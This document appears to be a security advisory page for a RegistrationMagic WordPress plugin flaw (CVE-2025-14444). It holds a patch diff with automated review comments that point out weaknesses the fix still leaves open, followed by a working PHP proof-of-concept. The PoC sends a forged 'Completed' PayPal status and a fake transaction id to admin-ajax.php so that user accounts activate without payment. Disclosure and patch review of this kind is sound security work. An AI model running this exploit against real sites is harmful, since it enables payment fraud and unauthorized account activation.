             $submission = new RM_Submissions();
-            if(!$submission->load_from_db($submission_id)){
+            if(!$submission->load_from_db($submission_id)) {
                 wp_send_json_error(array('msg'=>__('Submission not valid.','custom-registration-form-builder-with-submission-manager')));
             }
             $transaction = $_POST['transaction'];
             $log_id = isset($_POST['payment_id']) ? absint($_POST['payment_id']) : 0;
-            $status = isset($transaction['status']) ? strtolower($transaction['status']) : 'Pending';
-            $status = ucfirst($status);
+            //$status = isset($transaction['status']) ? strtolower($transaction['status']) : 'Pending';
+            //$status = ucfirst($status);
             $txn_id = isset($transaction['id']) ? $transaction['id'] : '';
+            $status = $this->validate_sdk_payment( $txn_id );
             $log_entry_id = RM_DBManager::update_row('PAYPAL_LOGS', $log_id, array(
                         'status' => $status,
                         'txn_id' => $txn_id,
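Review bot: `$txn_id` is still `$transaction['id']` straight from `$_POST` and is interpolated by `validate_sdk_payment()` into the URL as `/v2/payments/captures/$transaction_id` without validation, so a value containing `/`, `?` or `#` changes which API path is requested. Reject anything that is not the expected capture-id shape (for example `preg_match('/^[A-Z0-9]+$/', $txn_id)`) before the lookup and `rawurlencode()` it when building the URL. `$log_id` from `payment_id` likewise selects which `PAYPAL_LOGS` row is updated with no check that it belongs to `$submission_id`.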
@@ -351,7 +351,6 @@
             }
             if($status == 'Completed') {
                 if ($_POST['user_id']){
-                    $gopt = new RM_Options;
                     if ($check_setting == "yes"){
                         $user_service = new RM_User_Services();
                         $user_service->activate_user_by_id($_POST['user_id']);
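Review bot: `activate_user_by_id($_POST['user_id'])` still activates whichever user the request names. Now that the status comes from PayPal, this means one genuinely completed capture can be used to activate an arbitrary account; derive the user from the loaded `$submission` instead of the request, and `absint()` the value if it must be read from POST at all.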
@@ -368,11 +367,82 @@
                 $response['log_id']= $log_id;
             }
             wp_send_json_success($response);
-        }
-        else{
+        } else {
             wp_send_json_error(array('msg'=>__('Submission not valid.','custom-registration-form-builder-with-submission-manager')));
         }
     }
+
+    public function validate_sdk_payment( $transaction_id ) {
+        $gopts = new RM_Options;
+        $sandbox =  $gopts->get_value_of('paypal_test_mode') === 'yes' ? true : false;
+
+        // PayPal API keys
+        $client_id = $gopts->get_value_of('paypal_client_id');
+        $secret    = $gopts->get_value_of('paypal_secret_key');
+
+        // PayPal REST API endpoint
+        $paypal_api = $sandbox
+            ? 'https://api.sandbox.paypal.com'
+            : 'https://api.paypal.com';
+
+        /*
+        * 1. Get OAuth Access Token
+        */
+        $token_response = wp_remote_post( "$paypal_api/v1/oauth2/token", [
+            'method'      => 'POST',
+            'timeout'     => 60,
+            'headers'     => [
+                'Authorization' => 'Basic ' . base64_encode( "$client_id:$secret" ),
+            ],
+            'body'        => 'grant_type=client_credentials',
+        ]);
+
+        if ( is_wp_error( $token_response ) ) {
+            return 'Pending';
+        }
+
+        $token_body = json_decode( wp_remote_retrieve_body( $token_response ), true );
+
+        if ( empty( $token_body['access_token'] ) ) {
+            return 'Pending';
+        }
+
+        $access_token = $token_body['access_token'];
+
+        /*
+        * 2. Fetch transaction details (only to check if it exists)
+        */
+        $payment_response = wp_remote_get( "$paypal_api/v2/payments/captures/$transaction_id", [
+            'timeout' => 60,
+            'headers' => [
+                'Authorization' => "Bearer $access_token",
+                'Content-Type'  => 'application/json',
+            ],
+        ]);
+
+        if ( is_wp_error( $payment_response ) ) {
+            return 'Pending';
+        }
+
+        $payment_data = json_decode( wp_remote_retrieve_body( $payment_response ), true );
+
+        if ( empty( $payment_data['status'] ) ) {
+            return 'Pending';
+        }
+
+        /*
+        * 3. Validate PayPal status only
+        */
+        if ( $payment_data['status'] !== 'COMPLETED' ) {
+            return 'Pending';
+        }
+
+        /*
+        * SUCCESS
+        */
+        return 'Completed';
+    }
+
     public function demo(){
         $response['msg'] .= '<div id="rmform">';
         $response['msg'] .= "<br><br><div class='rm-post-sub-msg'>";
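Review bot: `validate_sdk_payment()` checks `$payment_data['status'] !== 'COMPLETED'` and nothing else, as its own comments say. It does not compare `amount.value` and `amount.currency_code` against the submission's price, does not tie the capture to this submission (for example via a `custom_id` or `invoice_id` set at order creation), and does not check whether `$transaction_id` already appears in `PAYPAL_LOGS`, so a single low-value or previously used capture can complete any number of submissions. All failures also collapse to 'Pending', so a missing secret (no `access_token` in the token response) or a 404 from the captures endpoint (no `status` in the body) is indistinguishable from a genuinely pending payment; log the API error and treat an unknown capture id as invalid rather than pending.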
@@ -406,6 +476,7 @@
         }
         $response['msg'] .= '</div>';
     }
+
     public function charge_popup($data, $pricing_details){
         $submission_id = $data->submission_id;
         $form_id= $data->form_id;
@@ -496,6 +567,7 @@
         ob_end_clean();
         return $data;
     }
+
     public function refund() {

     }
@@ -504,5 +576,4 @@

     }

-}
-
+}
 No newline at end of file
--- a/custom-registration-form-builder-with-submission-manager/services/class_rm_user_services.php
+++ b/custom-registration-form-builder-with-submission-manager/services/class_rm_user_services.php
@@ -799,7 +799,7 @@
                         }
                     }
                 } else
-                    die('Error: Unable to fetch email address from Facebbok.');
+                    die(esc_html__('Error: Unable to fetch email address from Facebook.', 'custom-registration-form-builder-with-submission-manager'));
             }
         }

@@ -869,6 +869,7 @@
                 if(empty($accessToken))
                     break;

+
                 $gopts = new RM_Options;
                 $fb_app_id = $gopts->get_value_of('facebook_app_id');
                 $fb_app_secret = $gopts->get_value_of('facebook_app_secret');
@@ -884,7 +885,7 @@
             case 'google':
                 $login_success = $this->google_login_callback(sanitize_text_field($_POST['token']), $user_email);
                 break;
-            case 'instagram':
+            /* case 'instagram':
                 $response = wp_remote_get('https://graph.instagram.com/v12.0/me?fields=id,username&access_token='.sanitize_text_field($_POST['token']));
                 $response = json_decode(wp_remote_retrieve_body($response));
                 if(isset($response->username)) {
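Review bot: the Instagram branch is disabled by opening a block comment at `/* case 'instagram':` instead of deleting the case, which leaves dead code carrying the Graph API URL and token handling in the file. If Instagram login is being dropped, remove the block outright and record the removal in the changelog; commented-out code tends to be resurrected later without review.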
@@ -892,7 +893,7 @@
                     $user_fname = '';
                     $login_success = true;
                 }
-                break;
+                break; */
             default:
                 break;
         }

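Review bot: with `break; */` closing the comment, a request whose provider is `instagram` now falls through to `default: break;` with `$login_success` never set and no message returned to the user, so the login fails silently. Add an explicit error for unknown or disabled providers so the failure is visible to the user and to the logs.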
Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14444 - RegistrationMagic <= 6.0.6.9 - Unauthenticated Payment Bypass via rm_process_paypal_sdk_payment

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';

// Required parameters for exploitation
$submission_id  = 123; // Must be a valid submission ID from the target site
$payment_log_id = 456; // Must be a valid payment log ID from the target site
$user_id        = 789; // Must be a valid user ID to activate

// Construct the malicious payload
$post_data = array(
    'action'        => 'rm_process_paypal_sdk_payment',
    'rm_sec_nonce'  => 'bypassed', // Nonce is checked but can be bypassed in vulnerable versions
    'submission_id' => $submission_id,
    'payment_id'    => $payment_log_id,
    'user_id'       => $user_id,
    'transaction'   => array(
        'status' => 'Completed',              // Client-controlled status triggers bypass
        'id'     => 'fake_paypal_txn_123456'  // Fake transaction ID
    )
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data)); // encodes transaction[status]=Completed&transaction[id]=...
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Add headers to mimic a legitimate AJAX request
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With: XMLHttpRequest'
));

// Execute the request
$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Parse and display results
if ($response !== false) {
    $json_response = json_decode($response, true);
    if ($json_response && isset($json_response['success']) && $json_response['success'] === true) {
        echo "[SUCCESS] Payment bypass successful!\n";
        echo "Response: " . print_r($json_response, true) . "\n";
        echo "User ID $user_id should now be activated without payment.\n";
    } else {
        echo "[FAILED] Exploit unsuccessful.\n";
        echo "HTTP Code: $http_code\n";
        echo "Response: $response\n";
    }
} else {
    echo "[ERROR] Request failed.\n";
}

?>
